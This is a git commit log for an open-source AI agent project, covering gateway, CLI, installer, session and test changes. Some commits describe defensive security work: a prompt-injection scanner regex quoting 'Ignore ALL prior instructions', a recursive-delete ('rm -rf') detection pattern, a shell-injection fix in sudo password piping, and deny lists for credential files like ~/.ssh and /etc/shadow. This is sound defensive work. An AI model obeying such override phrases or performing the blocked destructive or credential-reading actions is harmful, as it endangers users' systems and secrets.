- TestCheckClarifyRequirements: 1 test verifying always-true behavior

- TestClarifySchema: 6 tests verifying OpenAI function schema
  - Required/optional parameters, maxItems constraint

Total: 20 tests covering all public functions and edge cases.
2026-02-27 03:29:26 -05:00
teknium1
fec5d59fb3 feat(gateway): integrate pairing store and event hook system
This update introduces a pairing store for code-based user authorization and an event hook system within the GatewayRunner class. These enhancements aim to improve user authorization processes and facilitate event-driven functionalities in the gateway.
2026-02-27 00:23:26 -08:00
Bartok9
7285e44064 docs: add CONTRIBUTING.md with contributor guidelines
Add comprehensive contributor guide covering:
- Development setup
- Project structure overview
- Code style guidelines
- How to add new tools
- How to add new skills
- Pull request process
- Commit message conventions
- Security considerations
2026-02-27 03:23:04 -05:00
teknium1
2ff54ae6b3 fix(gateway): Remove session_db from AIAgent instantiation to prevent errors
This change removes the session_db parameter from AIAgent instantiations in gateway/run.py, addressing issues related to session management. The previous implementation caused errors when session_db was not properly initialized, leading to failures in session_search functionality.
2026-02-27 00:13:47 -08:00
Teknium
f74ac0fc3a Merge pull request #108 from Bartok9/fix-session-db-gateway
fix(gateway): Pass session_db to AIAgent, fixing session_search error
2026-02-27 00:11:18 -08:00
teknium1
26a6da27fa feat(research): add arXiv search skill and documentation
- Introduced a new skill for searching and retrieving academic papers from arXiv using their REST API, allowing searches by keyword, author, category, or ID.
- Added a helper script for clean output of search results, including options for sorting and filtering.
- Created a DESCRIPTION.md file outlining the purpose and functionality of the research skills.
2026-02-27 00:05:06 -08:00
teknium1
19abbfff96 feat(ocr-and-documents): add OCR and document extraction skills
- Introduced new skills for extracting text from PDFs, scanned documents, and images using OCR and document parsing tools.
- Added detailed documentation for usage and installation of `pymupdf` and `marker-pdf` for local extraction.
- Implemented scripts for text extraction with both lightweight and high-quality options, including support for various document formats.
- Updated web extraction functionality to handle PDF URLs directly, enhancing usability for academic papers and documents.
2026-02-26 23:06:08 -08:00
Bartok Moltbot
8aa531c7fa fix(gateway): Pass session_db to AIAgent, fixing session_search error
When running via the gateway (e.g. Telegram), the session_search tool
returned: {"error": "session_search must be handled by the agent loop"}

Root cause:
- gateway/run.py creates AIAgent without passing session_db=
- self._session_db is None in the agent instance
- The dispatch condition "elif function_name == 'session_search' and self._session_db"
  skips when _session_db is None, falling through to the generic error

This fix:
1. Initializes self._session_db in GatewayRunner.__init__()
2. Passes session_db to all AIAgent instantiations in gateway/run.py
3. Adds defensive fallback in run_agent.py to return a clear error when
   session_db is unavailable, instead of falling through

Fixes #105
2026-02-27 00:32:17 -05:00
Teknium
21cf339a85 Merge pull request #59 from deankerr/fix/ssh-terminal-check
fix: add SSH backend to terminal requirements check
2026-02-26 21:22:47 -08:00
teknium1
588cdacd49 feat(session): implement session reset policy for messaging platforms
- Added configuration options for automatic session resets based on inactivity or daily boundaries in cli-config.yaml.
- Enhanced SessionResetPolicy class to support a "none" mode for no auto-resets.
- Implemented memory flushing before session resets in SessionStore to preserve important information.
- Updated setup wizard to guide users in configuring session reset preferences.
2026-02-26 21:20:50 -08:00
teknium1
0cce536fb2 fix: fileops on mac
Co-authored-by: Dean Kerr <dean.kerr@gmail.com>
2026-02-26 21:20:25 -08:00
teknium1
b281ecd50a Fix: rending issue on /skills command 2026-02-26 20:29:52 -08:00
teknium1
b267e34092 feat(cli): add auto-restart functionality for hermes-gateway service when updating
- Implemented a check to determine if the hermes-gateway service is active after an update.
- Added logic to automatically restart the service if it is running, ensuring changes are applied without manual intervention.
- Updated user guidance to reflect the new auto-restart feature, removing the need for manual restart instructions.
2026-02-26 20:26:05 -08:00
teknium1
58fce0a37b feat(api): implement dynamic max tokens handling for various providers
- Added _max_tokens_param method in AIAgent to return appropriate max tokens parameter based on the provider (OpenAI vs. others).
- Updated API calls in AIAgent to utilize the new max tokens handling.
- Introduced auxiliary_max_tokens_param function in auxiliary_client for consistent max tokens management across auxiliary clients.
- Refactored multiple tools to use auxiliary_max_tokens_param for improved compatibility with different models and providers.
2026-02-26 20:23:56 -08:00
teknium1
f0458ebdb8 feat(config): enhance terminal environment variable management
- Updated .env.example to clarify terminal backend configuration and its relationship with config.yaml.
- Modified gateway/run.py to ensure terminal settings from config.yaml take precedence over .env, improving consistency in environment variable handling.
- Added mapping for terminal configuration options to corresponding environment variables for better integration.
2026-02-26 20:05:35 -08:00
teknium1
0a231c0783 feat(config): synchronize terminal settings with environment variables
- Added functionality to keep the .env file in sync with terminal configuration settings in config.yaml, ensuring terminal_tool can directly access necessary environment variables.
- Updated setup wizard to save selected backend and associated Docker image to .env for improved consistency and usability.
2026-02-26 20:02:46 -08:00
teknium1
7c1f90045e docs: update README and tools configuration for improved toolset management
- Updated README to reflect the new command for configuring tools per platform.
- Modified tools_config.py to correct the handling of preselected entries in the toolset checklist, ensuring proper functionality during user interaction.
2026-02-26 19:59:24 -08:00
teknium1
a5ea272936 refactor: streamline API key retrieval in transcription and TTS tools
- Removed fallback to OPENAI_API_KEY in favor of exclusively using VOICE_TOOLS_OPENAI_KEY for improved clarity and consistency.
- Updated environment variable checks to ensure only VOICE_TOOLS_OPENAI_KEY is considered, enhancing error handling and messaging.
2026-02-26 19:56:42 -08:00
teknium1
715825eac3 fix(cli): enhance provider configuration check for environment variables
- Updated the logic in _has_any_provider_configured to include OPENAI_BASE_URL as a valid provider variable, allowing local models to be recognized without an API key.
- Consolidated environment variable checks into a single tuple for better maintainability.
2026-02-26 19:56:24 -08:00
cesareth
1a97e82000 feat(cli): add /verbose slash command to toggle debug output at runtime
Closes #77. Users can now type /verbose in the CLI to toggle verbose
mode on or off without restarting. When enabled, full tool call
parameters, results, and debug logs are shown. The agent's
verbose_logging and quiet_mode flags are updated live, and Python
logging levels are reconfigured accordingly.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-26 23:18:45 +00:00
Erosika
70d1abf81b refactor: run Honcho and USER.md in tandem
USER.md stays in system prompt when Honcho is active -- prefetch is
additive context, not a replacement. Memory tool user observations
write to both USER.md (local) and Honcho (cross-session) simultaneously.
2026-02-26 18:07:33 -05:00
Erosika
1fd0fcddb2 feat: integrate Honcho with USER.md memory system
When Honcho is active:
- System prompt uses Honcho prefetch instead of USER.md
- memory tool target=user add routes to Honcho
- MEMORY.md untouched in all cases

When disabled, everything works as before.

Also wires up contextTokens config to cap prefetch size.
2026-02-26 18:07:17 -05:00
Erosika
ab4bbf2fb2 feat: add Honcho AI-native memory integration
Opt-in persistent cross-session user modeling via Honcho. Reads
~/.honcho/config.json as single source of truth (shared with
Claude Code, Cursor, and other Honcho-enabled tools). Zero impact
when disabled or unconfigured.

- honcho_integration/ package (client, session manager, peer resolution)
- Host-based config resolution matching claude-honcho/cursor-honcho pattern
- Prefetch user context into system prompt per conversation turn
- Sync user/assistant messages to Honcho after each exchange
- query_user_context tool for mid-conversation dialectic reasoning
- Gated activation: requires ~/.honcho/config.json with enabled=true
2026-02-26 18:07:17 -05:00
teknium1
669e4d0297 add experimental google workspace command center skill 2026-02-26 14:29:51 -08:00
0xbyt4
f92875bc3e fix(cli): reduce spinner flickering under patch_stdout
KawaiiSpinner used a two-phase clear+redraw approach: first write
\r + spaces to blank the line, then \r + new frame. When running
inside prompt_toolkit's patch_stdout proxy, each phase could trigger
a separate repaint, causing visible flickering every 120ms.

Replace with a single \r\033[K (carriage return + ANSI erase-to-EOL)
write so the line is cleared and redrawn atomically.
2026-02-26 23:55:07 +03:00
0xbyt4
7f36259f88 fix(cli): show correct config file path in /config command
show_config() always checked cli-config.yaml in the project directory,
but load_cli_config() first looks at ~/.hermes/config.yaml. When the
user config existed, /config would display "cli-config.yaml (not found)"
even though configuration was loaded successfully from ~/.hermes/.

Use the same lookup order as load_cli_config and display the actual
resolved path.
2026-02-26 23:49:08 +03:00
0xbyt4
2c28d9f560 fix(cli): respect explicit --max-turns value even when it equals default
max_turns used 60 as both the default and the sentinel to detect
whether the user passed the flag. This meant `--max-turns 60` was
indistinguishable from "not passed", so the env var
HERMES_MAX_ITERATIONS would silently override the explicit CLI value.

Change the default to None so any user-supplied value takes priority.
2026-02-26 23:43:38 +03:00
0xbyt4
c21b071e77 fix(cli): prevent paste detection from destroying multi-line input
The _on_text_changed handler collapsed buffer contents into a file
reference whenever the buffer had 5+ newlines, regardless of how
those lines were entered. This meant manually typing with Alt+Enter
would trigger the paste heuristic and silently replace the user's
carefully typed input.

Track the previous buffer length and only treat a change as a paste
when more than one character is added at once (real pastes insert many
characters in a single event, while typing adds one at a time).
2026-02-26 23:40:38 +03:00
0xbyt4
de197bd7cb fix(cli): prevent crash in save_config_value when model is a string
load_cli_config() supports both string and dict formats for the model
key (e.g. `model: "anthropic/claude-opus-4"`), but save_config_value()
assumed all intermediate keys are dicts. When the config file used the
string format, running `/model <name>` would crash with TypeError:
'str' object does not support item assignment.

Add an isinstance check so non-dict values are replaced with a fresh
dict before descending.
2026-02-26 23:35:00 +03:00
teknium1
bf9dd83c10 fix(cli): improve description extraction for toolsets
- Updated the description extraction logic to split on ". " (period+space) to avoid breaking on abbreviations like "e.g." or version numbers.
- Changed the method to prioritize the first line of the description, ensuring more relevant information is captured for display.
2026-02-26 12:11:32 -08:00
teknium1
760fb2ca0e feat(install): enhance installation script for build tools and interactive prompts
- Updated the installation script to check for necessary build tools on Debian/Ubuntu systems and prompt the user to install them if missing.
- Improved user interaction by redirecting input from /dev/tty for prompts, ensuring compatibility when the script is piped from curl.
- Added checks to verify the successful installation of the main package and provide guidance if installation fails.
- Enhanced the handling of shell configuration files to ensure ~/.local/bin is added to PATH for various shell types.
2026-02-26 11:37:40 -08:00
Teknium
a8ccaca8ea Merge pull request #68 from cutepawss/fix/dangerous-cmd-regex-false-positive
fix: prevent false positives in recursive delete detection
2026-02-26 11:32:06 -08:00
George Pickett
32070e6bc0 Merge remote-tracking branch 'origin/main' into codex/align-codex-provider-conventions-mainrepo
# Conflicts:
#	cron/scheduler.py
#	gateway/run.py
#	tools/delegate_tool.py
2026-02-26 10:56:29 -08:00
Daniel Sateler
f02f647237 fix(whatsapp): per-contact DM session isolation and user identity in context 2026-02-26 12:44:09 -03:00
Daniel Sateler
96043a8f7e fix(whatsapp): skip agent's own replies in bridge message handler 2026-02-26 12:43:24 -03:00
darya
0bb8d8faf5 fix: prevent silent abort in piped install when interactive prompts fail (#69)
Root cause: the install script uses `set -e` (exit on error) and `read -p`
for interactive prompts. When running via `curl | bash`, stdin is a pipe
(not a terminal), so `read -p` hits EOF and returns exit code 1. Under
`set -e`, this silently aborts the entire script before hermes is installed.

Fix: detect non-interactive mode using `[ -t 0 ]` (standard POSIX test for
terminal stdin) and skip all interactive prompts when running in piped mode.
Clear messages are shown instead, telling the user what to run manually.

Changes:
- Add IS_INTERACTIVE flag at script start ([ -t 0 ] check)
- Guard sudo package install prompt (the direct cause of #69)
- Guard setup wizard (calls interactive hermes setup)
- Guard WhatsApp pairing and gateway install prompts

All other prompts use the same read -p pattern and would fail the same way
in piped mode, so they are all guarded for completeness.

Closes #69
2026-02-26 17:45:50 +03:00
darya
f5c09a3aba test: add regression tests for recursive delete false positive fix
Add 15 new tests in two classes:

- TestRmFalsePositiveFix (8 tests): verify filenames starting with 'r'
  (readme.txt, requirements.txt, report.csv, etc.) are NOT falsely
  flagged as 'recursive delete'

- TestRmRecursiveFlagVariants (7 tests): verify all recursive delete
  flag styles (-r, -rf, -rfv, -fr, -irf, --recursive, sudo rm -rf)
  are still correctly caught

All 29 tests pass (14 existing + 15 new).
2026-02-26 16:40:44 +03:00
darya
3227cc65d1 fix: prevent false positives in recursive delete detection
The regex pattern for detecting recursive delete commands (rm -r, rm -rf,
etc.) incorrectly matched filenames starting with 'r' — e.g., 'rm readme.txt'
was flagged as 'recursive delete' because the dash-flag group was optional.

Fix: make the dash mandatory so only actual flags (-r, -rf, -rfv, -fr)
are matched. This eliminates false approval prompts for innocent commands
like 'rm readme.txt', 'rm requirements.txt', 'rm report.csv', etc.

Before: \brm\s+(-[^\s]*)?r  — matches 'rm readme.txt' (false positive)
After:  \brm\s+-[^\s]*r     — requires '-' prefix, no false positives
2026-02-26 16:32:01 +03:00
0xbyt4
90ca2ae16b test: add unit tests for run_agent.py (AIAgent)
71 tests covering pure functions, state/structure methods, and
conversation loop pieces. OpenAI client and tool loading are mocked.
2026-02-26 16:15:04 +03:00
Leon
25e260bb3a fix(security): prevent shell injection in sudo password piping
The sudo password was embedded in shell commands via single-quote
interpolation: echo '{password}' | sudo -S

If the password contained shell metacharacters (single quotes,
$(), backticks), they would be interpreted by the shell, enabling
arbitrary command execution.

Fix: use shlex.quote() which properly escapes all shell-special
characters, ensuring the password is always treated as a literal
string argument to echo.
2026-02-26 19:04:32 +07:00
0xbyt4
feea8332d6 fix: cron prompt injection scanner bypass for multi-word variants
The regex `ignore\s+(previous|all|above|prior)\s+instructions` only
allowed ONE word between "ignore" and "instructions". Multi-word
variants like "Ignore ALL prior instructions" bypassed the scanner
because "ALL" matched the alternation but then `\s+instructions`
failed to match "prior".

Fix: use `(?:\w+\s+)*` groups to allow optional extra words before
and after the keyword alternation.
2026-02-26 13:55:54 +03:00
0xbyt4
ffbdd7fcce test: add unit tests for 8 modules (batch 2)
Cover model_tools, toolset_distributions, context_compressor,
prompt_caching, cronjob_tools, session_search, process_registry,
and cron/scheduler with 127 new test cases.
2026-02-26 13:54:20 +03:00
0xbyt4
b699cf8c48 test: remove /etc platform-conditional tests from file_operations
These tests documented the macOS symlink bypass bug with
platform-conditional assertions. The fix and proper regression
tests are in PR #61 (tests/tools/test_write_deny.py), so remove
them here to avoid ordering conflicts between the two PRs.
2026-02-26 13:43:30 +03:00
0xbyt4
2efd9bbac4 fix: resolve symlink bypass in write deny list on macOS
On macOS, /etc is a symlink to /private/etc. The _is_write_denied()
function resolves the input path with os.path.realpath() but the deny
list entries were stored as literal strings ("/etc/shadow"). This meant
the resolved path "/private/etc/shadow" never matched, allowing writes
to sensitive system files on macOS.

Fix: Apply os.path.realpath() to deny list entries at module load time
so both sides of the comparison use resolved paths.

Adds 19 regression tests in tests/tools/test_write_deny.py.
2026-02-26 13:30:55 +03:00
0xbyt4
0ac3af8776 test: add unit tests for 8 untested modules
Add comprehensive test coverage for:
- cron/jobs.py: schedule parsing, job CRUD, due-job detection (34 tests)
- tools/memory_tool.py: security scanning, MemoryStore ops, dispatcher (32 tests)
- toolsets.py: resolution, validation, composition, cycle detection (19 tests)
- tools/file_operations.py: write deny list, result dataclasses, helpers (37 tests)
- agent/prompt_builder.py: context scanning, truncation, skills index (24 tests)
- agent/model_metadata.py: token estimation, context lengths (16 tests)
- hermes_state.py: SessionDB SQLite CRUD, FTS5 search, export, prune (28 tests)

Total: 210 new tests, all passing (380 total suite).
2026-02-26 13:27:58 +03:00
Dean Kerr
fed9f06c4e fix: add SSH backend to terminal requirements check
The SSH backend was missing from check_terminal_requirements(), causing
it to fall through to `return False`. This silently disabled both the
terminal and file tools when TERMINAL_ENV=ssh was configured.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 20:41:59 +11:00
teknium1
240f33a06f feat(docker): add support check for Docker's --storage-opt option
- Introduced a static method to verify if the Docker storage driver supports the --storage-opt size= option.
- Enhanced resource argument handling in DockerEnvironment to conditionally include storage options based on the support check.
- Added caching for the support check result to optimize performance across instances.
2026-02-26 01:15:56 -08:00
Moritz Bierling
254aafb265 Fix SystemExit traceback during atexit cleanup on Ctrl+C
The browser_tool signal handler calls sys.exit(130) which raises
SystemExit. When this fires during terminal_tool's atexit cleanup
(specifically during _cleanup_thread.join()), it produces an unhandled
traceback. Wrapping the join in a try/except suppresses the race
without changing shutdown behavior.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
2026-02-26 10:13:31 +01:00
teknium1
8bd82119be docs: update README with security details and environment variable descriptions
- Added a section on security, detailing the minimal environment for child processes and the handling of API keys and credentials.
- Included new environment variables: `LLM_MODEL` for default model name and `HERMES_HOME` for overriding the config directory.
2026-02-26 01:12:57 -08:00
Teknium
9a148bb9a3 Merge pull request #51 from deankerr/fix/cli-env-path-resolution
fix: consistent HERMES_HOME and .env path resolution across all entry points
2026-02-26 01:09:02 -08:00
teknium1
7a4241e406 Co-authored-by: Dogila Developer <valeshera11@gmail.com> 2026-02-26 01:04:47 -08:00
teknium1
cb92fbe749 feat: add Notion block types reference documentation
- Introduced a new markdown file detailing various Notion block types for API usage, including examples for creating and reading blocks.
- Covered block types such as paragraphs, headings, lists, to-dos, quotes, callouts, code, toggles, dividers, bookmarks, images, and more.
- Provided structured JSON examples for each block type to assist developers in implementation.
2026-02-26 01:03:27 -08:00
Teknium
1d04074464 Merge pull request #53 from JoshuaMart/fix/install
fix(install): create ~/.hermes before moving Node.js directory
2026-02-26 00:58:34 -08:00
Teknium
c4096b4731 Merge pull request #27 from VolodymyrBg/fix/tool-context-docstring-threading
fix: align threading docstring with implementation
2026-02-26 00:56:49 -08:00
teknium1
178658bf9f test: enhance session source tests and add validation for chat types
- Renamed test method for clarity and added comprehensive tests for `SessionSource` including handling of numeric `chat_id`, missing optional fields, and invalid platforms.
- Introduced tests for session source descriptions based on chat types and names, ensuring accurate representation in prompts.
- Improved file tools tests by validating schema structures, ensuring no duplicate model IDs, and enhancing error handling in file operations.
2026-02-26 00:53:57 -08:00
teknium1
d372eb1f0e feat: add uv.lock file for package management
- Introduced a new `uv.lock` file to manage package dependencies and versions.
- Included details for packages such as `aiohappyeyeballs` and `aiohttp`, specifying their versions, sources, and available wheels.
- Set Python version requirements and resolution markers to ensure compatibility.
2026-02-26 00:53:50 -08:00
Joshua MARTINELLE
ebe25fefd6 Add missing mkdir 2026-02-26 09:39:11 +01:00
Joshua MARTINELLE
688ccf05cb Format 2026-02-26 09:38:51 +01:00
Dean Kerr
9dc5615b9d fix: use HERMES_HOME constant in doctor.py directory check
Line 184 hardcoded Path.home() / ".hermes" instead of using the
existing HERMES_HOME variable which already respects the env var.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 19:20:30 +11:00
Dean Kerr
696e2316a8 fix: respect HERMES_HOME and add encoding fallback in rl_cli.py
Consistent with other entry points: use _hermes_home from HERMES_HOME
env var, and add UTF-8 → latin-1 encoding fallback on load_dotenv.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 19:01:13 +11:00
Dean Kerr
f2891b70d0 fix: respect HERMES_HOME env var in gateway and cron scheduler
Both entry points hardcoded Path.home() / ".hermes" for .env, config.yaml,
logs, and lock files. Now uses _hermes_home which reads HERMES_HOME env var
with ~/.hermes as default, matching cli.py and run_agent.py.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 18:51:46 +11:00
Teknium
dcf370cb6e Merge pull request #34 from 0xbyt4/test/reorganize-and-add-unit-tests
test: reorganize test structure and add missing unit tests
2026-02-25 23:49:34 -08:00
teknium1
1b8eb85eeb Add npm audit checks for Node.js packages in doctor.py
- Implemented functionality to run `npm audit` for specified Node.js package directories.
- Added checks for vulnerabilities, reporting critical, high, and moderate issues.
- Enhanced user feedback based on audit results, guiding users on necessary actions for vulnerabilities.
2026-02-25 23:47:39 -08:00
Dean Kerr
cf3236ed27 fix: resolve .env path from ~/.hermes/ in cli.py, matching run_agent.py pattern
Load ~/.hermes/.env first with project root as dev fallback, and remove
redundant second load_dotenv call inside load_cli_config(). Also sets
MSWEA_GLOBAL_CONFIG_DIR so mini-swe-agent shares the same config.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 18:37:20 +11:00
teknium1
6c86c7c4a9 Add output format examples for YouTube content
- Introduced a new markdown file detailing various output formats including chapters, summaries, Twitter threads, blog posts, and quotes.
- Each section provides structured examples to guide content creators in presenting their video material effectively.
2026-02-25 23:28:16 -08:00
teknium1
9cc2cf3241 Add youtube transcript collection skill:
Co-authored-by: UfukNode <ufuk@crivacy.io>
2026-02-25 23:28:09 -08:00
teknium1
9eb4a4a481 fix: gateway credential resolution, memory flush auth, and LLM_MODEL fallback
- Custom endpoint (OPENAI_API_KEY/OPENAI_BASE_URL) now works in gateway and cron
- Memory flush on /reset passes credentials to temp agent
- LLM_MODEL env var fallback matches CLI priority chain
- Obsidian skill: replace hardcoded paths with OBSIDIAN_VAULT_PATH env var
- Setup wizard: strip emojis from TerminalMenu to fix macOS rendering
- execute_code: allowlist-filter child process environment variables

Co-authored-by: VencentSoliman <4spacetuna@gmail.com>
2026-02-25 23:20:57 -08:00
Teknium
8463b7ea59 Merge pull request #46 from rsavitt/fix/docker-backend-macos
Fix Docker backend on macOS and subagent auth for Nous Portal
2026-02-25 23:17:25 -08:00
Teknium
faa185e37c Merge branch 'main' into fix/docker-backend-macos 2026-02-25 23:14:57 -08:00
Teknium
53b3177ca5 Merge pull request #48 from deankerr/fix/config-path-resolution
fix: resolve .env and config paths from ~/.hermes/, not project root
2026-02-25 23:11:30 -08:00
teknium1
76badfed63 Enhance CLI documentation and functionality for session resumption
- Updated README and CLI documentation to include new commands for resuming sessions: `--continue` for the most recent session and `--resume <id>` for specific sessions.
- Added examples in the CLI help output and detailed instructions on resuming sessions in the documentation.
- Improved user experience by automatically displaying the resume command upon exiting a session.
2026-02-25 23:04:08 -08:00
teknium1
3c1e31de3e Implement session continuation feature in CLI
- Added a new command-line argument `--continue` to allow users to resume the most recent CLI session easily.
- Introduced a helper function to retrieve the last session ID from the database.
- Updated command handling to integrate the new session continuation functionality.
2026-02-25 23:00:10 -08:00
teknium1
d2c932d3ac add session resumption for cli with easy copy paste command 2026-02-25 22:56:12 -08:00
Dean Kerr
5a569eb1b6 fix: resolve .env and config paths from HERMES_HOME, not PROJECT_ROOT
The `hermes` CLI entry point (hermes_cli/main.py) and the agent runner
(run_agent.py) only loaded .env from the project installation directory.
After the standard installer, code lives at ~/.hermes/hermes-agent/ but
config lives at ~/.hermes/ — so the .env was never found.

Aligns these entry points with the pattern already used by gateway/run.py
and rl_cli.py: load ~/.hermes/.env first, fall back to project root .env
for dev-mode compatibility.

Also fixes:
- status.py checking .env existence and API keys at PROJECT_ROOT
- doctor.py KeyError on tool availability (missing_vars vs env_vars)
- doctor.py checking logs/ and Skills Hub at PROJECT_ROOT instead of HERMES_HOME
- doctor.py redundant logs/ check (already covered by subdirectory loop)
- mini-swe-agent loading config from platformdirs default instead of ~/.hermes/

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-26 16:49:14 +11:00
teknium1
e5bd25c73f Fix: #41 2026-02-25 21:16:15 -08:00
teknium1
eb88474dd8 fix: strip emoji characters from menu labels in TerminalMenu
- Added regex to remove emoji characters from menu items to prevent visual issues on macOS, ensuring proper display and functionality.
2026-02-25 21:13:35 -08:00
teknium1
9fc0ca0a72 add full support for whatsapp 2026-02-25 21:04:36 -08:00
Raeli Savitt
95b6bd5df6 Harden agent attack surface: scan writes to memory, skills, cron, and context files
The security scanner (skills_guard.py) was only wired into the hub install path.
All other write paths to persistent state — skills created by the agent, memory
entries, cron prompts, and context files — bypassed it entirely. This closes
those gaps:

- file_operations: deny-list blocks writes to ~/.ssh, ~/.aws, ~/.hermes/.env, etc.
- code_execution_tool: filter secret env vars from sandbox child process
- skill_manager_tool: wire scan_skill() into create/edit/patch/write_file with rollback
- skills_guard: add "agent-created" trust level (same policy as community)
- memory_tool: scan content for injection/exfil before system prompt injection
- prompt_builder: scan AGENTS.md, .cursorrules, SOUL.md for prompt injection
- cronjob_tools: scan cron prompts for critical threats before scheduling

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 23:43:15 -05:00
teknium1
f1311ad3de refactor: update Obsidian vault path handling
- Changed the hardcoded vault path to be set via the OBSIDIAN_VAULT_PATH environment variable, with a default fallback.
- Updated all relevant commands to utilize the new variable for reading, listing, searching, creating, and appending notes, improving flexibility and usability.
2026-02-25 20:24:51 -08:00
Raeli Savitt
0310170869 Fix subagent auth: propagate parent API key to child agents
When using Nous Portal (or any non-OpenRouter provider), child agents
spawned by delegate_task failed with "No pricing available" or "Unknown
model" errors because they had no valid API key.

The delegate tool passed base_url but not api_key to child AIAgent
instances. Without an explicit key, children fell back to the empty
OPENROUTER_API_KEY env var, causing auth failures.

Extract the parent's API key from _client_kwargs and pass it through.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 22:37:36 -05:00
Raeli Savitt
b6d7e222c1 Fix Docker backend failures on macOS
Three issues prevented the Docker terminal backend from working:

1. `effective_image` was referenced but never defined — only the Modal
   backend sets this variable. Use `image` directly instead.

2. `--storage-opt size=N` is unsupported on Docker Desktop for Mac
   (requires overlay2 with xfs backing). Skip the flag on Darwin.

3. Docker requires absolute paths for `-w` (working directory) but the
   default cwd was `~`, which Docker does not expand. Default to `/root`
   and translate any `~` passed in from callers.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 22:31:05 -05:00
George Pickett
e71d9a89d2 Merge origin/main into codex/align-codex-provider-conventions-mainrepo 2026-02-25 19:28:44 -08:00
George Pickett
74c662b63a Harden Codex auth refresh and responses compatibility 2026-02-25 19:27:54 -08:00
George Pickett
91bdb9eb2d Fix Codex stream fallback for Responses completion gaps 2026-02-25 19:08:11 -08:00
George Pickett
47f16505d2 Omit optional function_call id in Responses replay input 2026-02-25 19:00:11 -08:00
George Pickett
e63986b534 Harden Codex stream handling and ack continuation 2026-02-25 18:56:06 -08:00
teknium1
cbde8548f4 Fix for gateway not using nous auth: issue #28 2026-02-25 18:51:28 -08:00
teknium1
7a3656aea2 refactor: integrate Nous Portal support in auxiliary client
- Added functionality to include product attribution tags for Nous Portal in auxiliary API calls.
- Introduced a mechanism to determine if the auxiliary client is backed by Nous Portal, affecting the extra body of requests.
- Updated various tools to utilize the new extra body configuration for enhanced tracking in API calls.
2026-02-25 18:39:36 -08:00
George Pickett
3ba8b15f13 Tone down Codex docs and prompt wording 2026-02-25 18:25:15 -08:00
George Pickett
7727a792f2 Revert README Codex messaging changes 2026-02-25 18:21:50 -08:00
George Pickett
ce175d7372 Fix Codex Responses continuation and schema parity 2026-02-25 18:20:41 -08:00
George Pickett
609b19b630 Add OpenAI Codex provider runtime and responses integration (without .agent/PLANS.md) 2026-02-25 18:20:38 -08:00
teknium1
e3cb957a10 refactor: streamline reasoning configuration checks in AIAgent
- Simplified the logic for determining support for reasoning based on the base URL by introducing clearer variable names.
- Added product attribution for the Nous Portal to the extra body of requests when applicable, enhancing tagging for better tracking.
2026-02-25 16:49:41 -08:00
teknium1
55a0178490 refactor: enhance configuration loading for GatewayRunner
- Implemented dynamic loading of environment variables and configuration from a YAML file to ensure fresh credentials for the GatewayRunner.
- Improved error handling during the loading process to accommodate different encoding scenarios and potential exceptions.
2026-02-25 16:40:52 -08:00
teknium1
9a858b8d67 add identifier for openrouter calls 2026-02-25 16:34:47 -08:00
teknium1
cbff32585d one more windoze fix? 2026-02-25 16:27:40 -08:00
0xbyt4
8fc28c34ce test: reorganize test structure and add missing unit tests
Reorganize flat tests/ directory to mirror source code structure
(tools/, gateway/, hermes_cli/, integration/). Add 11 new test files
covering previously untested modules: registry, patch_parser,
fuzzy_match, todo_tool, approval, file_tools, gateway session/config/
delivery, and hermes_cli config/models. Total: 147 unit tests passing,
9 integration tests gated behind pytest marker.
2026-02-26 03:20:08 +03:00
teknium1
d72b9eadec More fixes for windoze 2026-02-25 15:20:42 -08:00
teknium1
3c5bf5b9d8 refactor: enhance error handling in user prompts
- Updated exception handling in multiple prompt functions to catch NotImplementedError alongside ImportError, improving robustness across the application.
- Ensured fallback mechanisms are clearly documented for better understanding of platform limitations.
2026-02-25 14:10:54 -08:00
VolodymyrBg
5a07e26405 fix: align threading docstring with implementation 2026-02-25 23:56:06 +02:00
teknium1
cd66546e24 refactor: enhance install script output and command handling
- Updated the SSH cloning process to include a cleanup step for partial clones if the SSH attempt fails, improving the fallback to HTTPS.
- Modified output messages for clarity, including renaming the gateway installation command to better reflect its function.
2026-02-25 13:47:04 -08:00
teknium1
21a59a4a7c refactor: improve SSH cloning process in install script
- Added GIT_SSH_COMMAND to disable interactive prompts and set a timeout for SSH cloning, enhancing the cloning process for private repositories.
- Implemented cleanup of partial SSH clones if the SSH attempt fails, ensuring a smoother fallback to HTTPS cloning.
2026-02-25 13:41:16 -08:00
teknium1
b5dbf8e43d Update model version in hermes_cli to use openai/gpt-5.3-codex 2026-02-25 13:26:14 -08:00
teknium1
54e50b8a6e Update README.md to clarify the description of the AI agent, emphasizing its fully open-source nature and enhancing the overall messaging for better understanding. 2026-02-25 12:15:53 -08:00
teknium1
b35dbb0420 Update README.md to refine the description of the AI agent, emphasizing its growth and autonomy while streamlining the language for clarity. 2026-02-25 11:58:16 -08:00
teknium1
63f6afd75b Update README.md to replace badge links with new styles and add a link to the X platform for Nous Research 2026-02-25 11:56:12 -08:00
teknium1
3e311a0092 Update banner image to new version 2026-02-25 11:53:44 -08:00
teknium1
69d3d3c15a Hide Hermes model until next release with agentic capabilities 2026-02-25 11:00:06 -08:00
teknium1
33bc1a3b58 docs: add sandboxed terminal usage recommendations to README
- Introduced a new section in the README outlining the benefits and configurations for running Hermes with a sandboxed terminal backend.
- Provided examples for SSH, Docker, and Modal cloud sandbox setups to enhance security and isolation during command execution.
2026-02-25 10:38:55 -08:00
teknium1
740dd928f7 Release set of skills 2026-02-25 05:21:17 -08:00
teknium1
757d012ab5 refactor: remove outdated skills and references from MLOps
- Deleted the `huggingface-accelerate` skill documentation, which included details on distributed training and common workflows.
- Removed `custom-plugins.md`, `megatron-integration.md`, `performance.md`, and other related reference documents that were no longer relevant or necessary.
- This cleanup aims to streamline the MLOps skills repository and improve maintainability.
2026-02-25 04:22:48 -08:00
teknium1
